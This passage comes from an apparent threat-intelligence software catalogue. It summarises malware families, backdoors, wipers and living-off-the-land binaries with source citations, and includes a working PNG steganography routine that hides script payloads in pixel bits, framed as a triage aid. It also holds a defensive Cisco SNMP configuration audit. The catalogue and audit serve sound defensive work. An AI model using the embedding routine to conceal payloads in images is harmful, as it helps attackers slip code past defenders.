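    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Inverse of write_png; handles only what write_png emits (8-bit RGB, filter 0)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        length, tag = struct.unpack_from(">I4s", data, pos)
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack_from(">IIBB", body)
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB is supported here")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length          # length + tag + data + crc
    raw = zlib.decompress(idat)
    stride = 1 + 3 * width
    rows = []
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError("filtered scanline; this reader handles filter type 0 only")
        rows.append([tuple(line[1 + 3 * x:4 + 3 * x]) for x in range(width)])
    return rows


def embed(rows, payload: bytes):
    """Store len(payload) then payload, one byte per pixel: high nibble in R's
    low 4 bits, low nibble in B's low 4 bits. Each channel moves by at most 15."""
    flat = [px for row in rows for px in row]
    data = struct.pack(">I", len(payload)) + payload
    if len(data) > len(flat):
        raise ValueError("cover image too small for payload")
    for i, byte in enumerate(data):
        r, g, b = flat[i]
        flat[i] = ((r & 0xF0) | (byte >> 4), g, (b & 0xF0) | (byte & 0x0F))
    width = len(rows[0])
    return [flat[y * width:(y + 1) * width] for y in range(len(rows))]


def extract(rows) -> bytes:
    """Recover the payload. This doubles as the hunting check: a plausible length
    header followed by mostly printable bytes means the image is a carrier."""
    flat = [px for row in rows for px in row]

    def nibbles(i):
        return ((flat[i][0] & 0x0F) << 4) | (flat[i][2] & 0x0F)

    n = struct.unpack(">I", bytes(nibbles(i) for i in range(4)))[0]
    if n > len(flat) - 4:
        raise ValueError("length header exceeds image; not a carrier in this scheme")
    return bytes(nibbles(i) for i in range(4, 4 + n))


def make_cover(width: int, height: int):
    """Constructed gradient cover image."""
    return [[((x * 8) & 0xFF, (y * 32) & 0xFF, ((x + y) * 4) & 0xFF) for x in range(width)]
            for y in range(height)]


def roundtrip(payload: bytes, width: int = 32, height: int = 8) -> bytes:
    png = write_png(embed(make_cover(width, height), payload))
    return extract(read_png(png))


if __name__ == "__main__":
    script = b'Write-Host "constructed demo payload, not a real script"'
    print("round-trip ok:", roundtrip(script) == script)
```

Because only the low nibbles are touched, the carrier survives lossless storage and re-encoding but not JPEG recompression or resizing, which is why the tool emits PNG. For triage, run `extract` against the decoded pixels of a suspect image: an unembedded cover yields a nonsense length and raises, while a carrier yields readable script text.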

IOBit

IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.<sup>[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]</sup>

The tag is: misp-galaxy:software="IOBit"

ipconfig

[ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6) is a Windows utility that can be used to find information about a system’s TCP/IP, DNS, DHCP, and adapter configuration. <sup>[[TechNet Ipconfig](https://app.tidalcyber.com/references/8a6e6f59-70fb-48bf-96d2-318dd92df995)]</sup>

The tag is: misp-galaxy:software="ipconfig"

IronNetInjector

[IronNetInjector](https://app.tidalcyber.com/software/9ca96281-8ff9-4619-a79d-16c5a9594eae) is a [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.<sup>[[Unit 42 IronNetInjector February 2021](https://app.tidalcyber.com/references/f04c89f7-d951-4ebc-a5e4-2cc69476c43f)]</sup>

The tag is: misp-galaxy:software="IronNetInjector"

ISMInjector

The tag is: misp-galaxy:software="ISMInjector"

Ixeshe

[Ixeshe](https://app.tidalcyber.com/software/6dbf31cf-0ba0-48b4-be82-38889450845c) is a malware family that has been used since at least 2009 against targets in East Asia. <sup>[[Moran 2013](https://app.tidalcyber.com/references/d38bdb47-1a8d-43f8-b7ed-dfa5e430ac2f)]</sup>

The tag is: misp-galaxy:software="Ixeshe"

Jaguar Tooth

Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.<sup>[[UK NCSC Jaguar Tooth April 18 2023](/references/954e0cb9-9a93-4cac-af84-c6989b973fac)]</sup>

Related Vulnerabilities: CVE-2017-6742<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

The tag is: misp-galaxy:software="Jaguar Tooth"
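The delivery path above runs through SNMP, so the first thing to check on an IOS estate is how SNMP is exposed. The following audit is an added example, not NCSC's or CISA's code: it reads a Cisco IOS running configuration and flags SNMPv1/v2c community strings, write access, missing or dangling access-lists and the absence of an SNMPv3 auth/priv group. The configuration text is constructed. It checks configuration only; whether the IOS image is patched for CVE-2017-6742 is a software-version question this script cannot answer.

```python
"""Audit a Cisco IOS configuration for the SNMP exposure that Jaguar Tooth's
delivery path depends on (added example, not NCSC's or CISA's; config text is
constructed). Configuration only: whether the IOS image itself is patched for
CVE-2017-6742 is a version question this script cannot answer."""
import re

# snmp-server community <string> [view <name>] [RO|RW] [<access-list>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?: view (\S+))?(?: (RO|RW))?(?: (\S+))?\s*$", re.I)

WEAK_CONFIG = """\
snmp-server community public RO
snmp-server community private RW
snmp-server location Substation-3
"""

HARDENED_CONFIG = """\
access-list 10 permit 10.0.0.5
access-list 10 deny any log
snmp-server group NETMON v3 priv
snmp-server user nms NETMON v3 auth sha AuthPass123 priv aes 128 PrivPass123
snmp-server location Substation-3
"""


def audit_snmp(config: str) -> list:
    """Return findings; empty means only SNMPv3 with auth/priv is configured."""
    findings, acls, communities, has_v3 = [], set(), [], False
    for raw in config.splitlines():
        line = raw.strip()
        if m := re.match(r"^access-list (\S+)", line):
            acls.add(m.group(1))
        elif m := re.match(r"^ip access-list (?:standard|extended) (\S+)", line):
            acls.add(m.group(1))
        elif re.match(r"^snmp-server group \S+ v3 (?:auth|priv)\b", line, re.I):
            has_v3 = True
        elif m := COMMUNITY_RE.match(line):
            communities.append(m.groups())
    for name, _view, mode, acl in communities:
        mode = (mode or "RO").upper()          # IOS defaults a community to RO
        tag = f"community '{name}' ({mode})"
        findings.append(f"{tag}: SNMPv1/v2c enabled; the community string is the "
                        "only secret and travels in cleartext")
        if name.lower() in {"public", "private"}:
            findings.append(f"{tag}: well-known default community string")
        if mode == "RW":
            findings.append(f"{tag}: write access allows remote configuration changes")
        if acl is None:
            findings.append(f"{tag}: no access-list, reachable from any source")
        elif acl not in acls:
            findings.append(f"{tag}: access-list {acl} is referenced but not defined")
    if communities and not has_v3:
        findings.append("no SNMPv3 group with auth/priv; managers have no "
                        "authenticated alternative to the community strings")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_snmp(cfg) or ["ok"])
```

An access-list on a community limits which source addresses can even attempt the SNMP exchange, which is the control that matters when the vulnerable code sits behind a community string; retiring v1/v2c in favour of a v3 priv group removes the cleartext secret entirely.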

Janicab

[Janicab](https://app.tidalcyber.com/software/a4debf1f-8a37-4c89-8ebc-31de71d33f79) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. <sup>[[Janicab](https://app.tidalcyber.com/references/1acc1a83-faac-41d3-a08b-cc3a539567fb)]</sup>

The tag is: misp-galaxy:software="Janicab"

Javali

[Javali](https://app.tidalcyber.com/software/853d3d18-d746-4650-a9bd-c36a0e86dd02) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Javali"

JCry

[JCry](https://app.tidalcyber.com/software/41ec0bbc-65ca-4913-a763-1638215d7b2f) is ransomware written in Go. It was identified as part of the #OpJerusalem 2019 campaign.<sup>[[Carbon Black JCry May 2019](https://app.tidalcyber.com/references/deb97163-323a-493a-9c73-b41c8c5e5cd1)]</sup>

The tag is: misp-galaxy:software="JCry"

Trojan.Sofacy - Associated Software

This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.<sup>[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]</sup>

The tag is: misp-galaxy:software="Trojan.Sofacy - Associated Software"

Sednit - Associated Software

This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.<sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup>

The tag is: misp-galaxy:software="Sednit - Associated Software"

Seduploader - Associated Software

The tag is: misp-galaxy:software="Seduploader - Associated Software"

JKEYSKW - Associated Software

The tag is: misp-galaxy:software="JKEYSKW - Associated Software"

GAMEFISH - Associated Software

The tag is: misp-galaxy:software="GAMEFISH - Associated Software"

SofacyCarberp - Associated Software

The tag is: misp-galaxy:software="SofacyCarberp - Associated Software"

JHUHUGIT

The tag is: misp-galaxy:software="JHUHUGIT"

JPIN

The tag is: misp-galaxy:software="JPIN"

JSocket - Associated Software

The tag is: misp-galaxy:software="JSocket - Associated Software"

Unrecom - Associated Software

The tag is: misp-galaxy:software="Unrecom - Associated Software"

jFrutas - Associated Software

The tag is: misp-galaxy:software="jFrutas - Associated Software"

Adwind - Associated Software

The tag is: misp-galaxy:software="Adwind - Associated Software"

jBiFrost - Associated Software

The tag is: misp-galaxy:software="jBiFrost - Associated Software"

Trojan.Maljava - Associated Software

The tag is: misp-galaxy:software="Trojan.Maljava - Associated Software"

AlienSpy - Associated Software

The tag is: misp-galaxy:software="AlienSpy - Associated Software"

Frutas - Associated Software

The tag is: misp-galaxy:software="Frutas - Associated Software"

Sockrat - Associated Software

The tag is: misp-galaxy:software="Sockrat - Associated Software"

jRAT

[jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) have been distributed via a software-as-a-service platform, similar to an online subscription model.<sup>[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]</sup> <sup>[[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]</sup>

The tag is: misp-galaxy:software="jRAT"

Jsc.exe - Associated Software

<sup>[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]</sup>

The tag is: misp-galaxy:software="Jsc.exe - Associated Software"

Jsc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe

Detection:

* Sigma: [proc_creation_win_lolbin_jsc.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml)
* IOC: Jsc.exe should normally not run on a system unless it is used for development.<sup>[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]</sup>

The tag is: misp-galaxy:software="Jsc"

JSS Loader

[JSS Loader](https://app.tidalcyber.com/software/c67f3029-a26c-4752-b7f1-8e3369c2f79d) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least 2020.<sup>[[eSentire FIN7 July 2021](https://app.tidalcyber.com/references/3976dd0e-7dee-4ae7-8c38-484b12ca233e)]</sup><sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup>

The tag is: misp-galaxy:software="JSS Loader"

KARAE

The tag is: misp-galaxy:software="KARAE"

Kasidet

[Kasidet](https://app.tidalcyber.com/software/1896b9c9-a93e-4220-b4c2-6c4c9c5ca297) is a backdoor that has been dropped by using malicious VBA macros. <sup>[[Zscaler Kasidet](https://app.tidalcyber.com/references/63077223-4711-4c1e-9fb2-3995c7e03cf2)]</sup>

The tag is: misp-galaxy:software="Kasidet"

Kazuar

[Kazuar](https://app.tidalcyber.com/software/e93990a0-4841-4867-8b74-ac2806d787bf) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. <sup>[[Unit 42 Kazuar May 2017](https://app.tidalcyber.com/references/07e64ee6-3d3e-49e4-bb06-ff5897e26ea9)]</sup>

The tag is: misp-galaxy:software="Kazuar"

Kerrdown

[Kerrdown](https://app.tidalcyber.com/software/17c28e46-1005-4737-8567-d4ad9f1aefd1) is a custom downloader that has been used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) since at least 2018 to install spyware from a server on the victim’s network.<sup>[[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)]</sup><sup>[[Unit 42 KerrDown February 2019](https://app.tidalcyber.com/references/bff5dbfe-d080-46c1-82b7-272e03d2aa8c)]</sup>

The tag is: misp-galaxy:software="Kerrdown"

Kessel

[Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) has been active since its C2 domain began resolving in August 2018.<sup>[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]</sup>

The tag is: misp-galaxy:software="Kessel"

Kevin

[Kevin](https://app.tidalcyber.com/software/b9730d7c-aa57-4d6f-9125-57dcb65b02e0) is a backdoor implant written in C++ that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2020, including in operations against organizations in Tunisia.<sup>[[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]</sup>

The tag is: misp-galaxy:software="Kevin"

KeyBoy

[KeyBoy](https://app.tidalcyber.com/software/6ec39371-d50b-43b6-937c-52de00491eab) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.<sup>[[CitizenLab KeyBoy Nov 2016](https://app.tidalcyber.com/references/a9394372-3981-4f41-ad66-9db343e773b1)]</sup><sup>[[PWC KeyBoys Feb 2017](https://app.tidalcyber.com/references/9ac6737b-c8a2-416f-bbc3-8c5556ad4833)]</sup>

The tag is: misp-galaxy:software="KeyBoy"

OSX/Keydnap - Associated Software

The tag is: misp-galaxy:software="OSX/Keydnap - Associated Software"

Keydnap

This piece of malware steals the content of the user’s keychain while maintaining a permanent backdoor <sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup>.

The tag is: misp-galaxy:software="Keydnap"

KEYMARBLE

[KEYMARBLE](https://app.tidalcyber.com/software/a644f61e-6a9b-41ab-beca-72518351c27f) is a Trojan that has reportedly been used by the North Korean government. <sup>[[US-CERT KEYMARBLE Aug 2018](https://app.tidalcyber.com/references/b30dd720-a85d-4bf5-84e1-394a27917ee7)]</sup>

The tag is: misp-galaxy:software="KEYMARBLE"

KEYPLUG.LINUX - Associated Software

The tag is: misp-galaxy:software="KEYPLUG.LINUX - Associated Software"

KEYPLUG

[KEYPLUG](https://app.tidalcyber.com/software/ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least June 2021.<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:software="KEYPLUG"

KGH_SPY

[KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) is a modular suite of tools used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) derived its name from PDB paths and internal names found in samples containing "KGH".<sup>[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]</sup>

The tag is: misp-galaxy:software="KGH_SPY"

Win32/KillDisk.NBI - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBI - Associated Software"

Win32/KillDisk.NBH - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBH - Associated Software"

Win32/KillDisk.NBD - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBD - Associated Software"

Win32/KillDisk.NBC - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBC - Associated Software"

Win32/KillDisk.NBB - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBB - Associated Software"

KillDisk

[KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) variants.<sup>[[KillDisk Ransomware](https://app.tidalcyber.com/references/9d22f13d-af6d-47b5-93ed-5e4b85b94978)]</sup><sup>[[ESEST Black Energy Jan 2016](https://app.tidalcyber.com/references/4d626eb9-3722-4aa4-b95e-1650cc2865c2)]</sup><sup>[[Trend Micro KillDisk 1](https://app.tidalcyber.com/references/8ae31db0-2744-4366-9747-55fc4679dbf5)]</sup><sup>[[Trend Micro KillDisk 2](https://app.tidalcyber.com/references/62d9a4c9-e669-4dd4-a584-4f3e3e54f97f)]</sup>

The tag is: misp-galaxy:software="KillDisk"

Kinsing

[Kinsing](https://app.tidalcyber.com/software/7b4f157c-4b34-4f55-9c20-ff787495e9ba) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. <sup>[[Aqua Kinsing April 2020](https://app.tidalcyber.com/references/67dd04dd-c0e0-49e6-9341-4e445d660641)]</sup><sup>[[Sysdig Kinsing November 2020](https://app.tidalcyber.com/references/4922dbb5-d3fd-4bf2-8af7-3b8889579c31)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup>

The tag is: misp-galaxy:software="Kinsing"

Kivars

[Kivars](https://app.tidalcyber.com/software/673ed346-9562-4997-80b2-e701b1a99a58) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in a 2010 campaign.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup>

The tag is: misp-galaxy:software="Kivars"

Koadic

[Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.<sup>[[Github Koadic](https://app.tidalcyber.com/references/54cbf1bd-9aed-4f82-8c15-6e88dd5d8d64)]</sup><sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:software="Koadic"

Kobalos

[Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) was first identified in late 2019.<sup>[[ESET Kobalos Feb 2021](https://app.tidalcyber.com/references/883a9417-f7f6-4aa6-8708-8c320d4e0a7a)]</sup><sup>[[ESET Kobalos Jan 2021](https://app.tidalcyber.com/references/745e963e-33fd-40d4-a8c6-1a9f321017f4)]</sup>

The tag is: misp-galaxy:software="Kobalos"

Komplex

The tag is: misp-galaxy:software="Komplex"

KOMPROGO

[KOMPROGO](https://app.tidalcyber.com/software/3067f148-2e2b-4aac-9652-59823b3ad4f1) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) that is capable of process, file, and registry management. <sup>[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]</sup>

The tag is: misp-galaxy:software="KOMPROGO"

KONNI

[KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) has significant code overlap with the [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) to APT37.<sup>[[Talos Konni May 2017](https://app.tidalcyber.com/references/4cb69c58-4e47-4fb9-9eef-8a0b5447a553)]</sup><sup>[[Unit 42 NOKKI Sept 2018](https://app.tidalcyber.com/references/f3d3b9bc-4c59-4a1f-b602-e3e884661708)]</sup><sup>[[Unit 42 Nokki Oct 2018](https://app.tidalcyber.com/references/4eea6638-a71b-4d74-acc4-0fac82ef72f6)]</sup><sup>[[Medium KONNI Jan 2020](https://app.tidalcyber.com/references/e117a6ac-eaa2-4494-b4ae-2d9ae52c3251)]</sup><sup>[[Malwarebytes Konni Aug 2021](https://app.tidalcyber.com/references/fb8c6402-ec18-414a-85f7-3d76eacbd890)]</sup>

The tag is: misp-galaxy:software="KONNI"

KOPILUWAK

[KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="KOPILUWAK"

Kwampirs

[Kwampirs](https://app.tidalcyber.com/software/35ac4018-8506-4025-a9e3-bd017700b3b3) is a backdoor Trojan used by [Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. <sup>[[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]</sup>

The tag is: misp-galaxy:software="Kwampirs"

Launch-VsDevShell.ps1 - Associated Software

<sup>[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]</sup>

The tag is: misp-galaxy:software="Launch-VsDevShell.ps1 - Associated Software"

Launch-VsDevShell

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet

Author: Nasreddine Bencherchali

Paths:

* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1

Detection:

* Sigma: proc_creation_win_lolbin_launch_vsdevshell.yml<sup>[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]</sup>

The tag is: misp-galaxy:software="Launch-VsDevShell"

LaZagne

[LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is publicly available on GitHub.<sup>[[GitHub LaZagne Dec 2018](https://app.tidalcyber.com/references/9347b507-3a41-405d-87f9-d4fc2bfc48e5)]</sup>

The tag is: misp-galaxy:software="LaZagne"

Ldifde.exe - Associated Software

<sup>[[Ldifde.exe - LOLBAS Project](/references/45d41df9-328c-4ea3-b0fb-fc9f43bdabe5)]</sup>

The tag is: misp-galaxy:software="Ldifde.exe - Associated Software"

Ldifde

Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".<sup>[[Ldifde Microsoft](/references/c47ed0e0-f3e3-41de-9ea7-64fe4e343d9d)]</sup>

The tag is: misp-galaxy:software="Ldifde"

LEMURLOOT

LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.<sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

Related Vulnerabilities: CVE-2023-34362<sup>[[U.S. CISA CL0P CVE-2023-34362 Exploitation](/references/07e48ca8-b965-4234-b04a-dfad45d58b22)]</sup><sup>[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]</sup>

The tag is: misp-galaxy:software="LEMURLOOT"

Level.io - Associated Software

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Level.io - Associated Software"

Level Remote Management - Associated Software

<sup>[[Mandiant UNC3944 September 14 2023](/references/7420d79f-c6a3-4932-9c2e-c9cc36e2ca35)]</sup>

The tag is: misp-galaxy:software="Level Remote Management - Associated Software"

Level

According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:software="Level"

LightNeuron

